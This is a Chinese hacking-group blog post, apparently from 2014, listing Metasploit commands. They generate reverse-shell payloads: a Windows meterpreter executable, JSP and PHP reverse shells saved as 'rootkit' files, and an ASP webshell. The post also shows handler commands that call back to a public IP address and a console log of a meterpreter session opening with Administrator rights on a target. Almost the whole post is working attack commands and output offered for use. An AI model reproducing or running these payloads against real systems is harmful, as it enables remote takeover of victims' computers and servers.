注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

K8拉登哥哥's Blog

K8搞基大队[K8team] 信息安全 网络安全 0day漏洞 渗透测试 黑客

 
 
 

日志

 
 

BT5 msf msfpayload生成2进制 msf生成exe meterpreter监听  

2014-08-31 11:35:10|  分类: BT5/Kali/MSF |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |


BT5 msf msfpayload生成2进制 msf生成exe
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.85.147 LPORT=4444 X >/root/Desktop/mt.exe


其它脚本
msfpayload java/jsp_shell_reverse_tcp LHOST=58.60.195.226  LPORT=1234 R > balckrootkit.jsp

msfcli multi/handler PAYLOAD=java/jsp_shell_reverse_tcp LHOST=58.60.195.226 LPORT=1234 E

msfpayload php/reverse_php  LHOST=58.60.195.226 LPORT=1234 R > balckrootkit.php

msfcli multi/handler PAYLOAD=php/reverse_php  LHOST=58.60.195.226 LPORT=1234 E

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.167| msfencode -t asp -o webshell.asp

msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.0.167 LPORT=443 E

监听

msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.85.147
LHOST => 192.168.85.147
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.85.147:4444
[*] Starting the payload handler...             //接着在目标机运行 mt.exe
[*] Sending stage (769536 bytes) to 192.168.85.160
[*] Meterpreter session 1 opened (192.168.85.147:4444 -> 192.168.85.160:1262) at 2014-08-26 10:45:11 +0800

meterpreter >


meterpreter > getuid    查看权限
Server username: K8ANTI-B2B9B81C\Administrator
meterpreter > ps   查看进程
  评论这张
 
阅读(1127)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016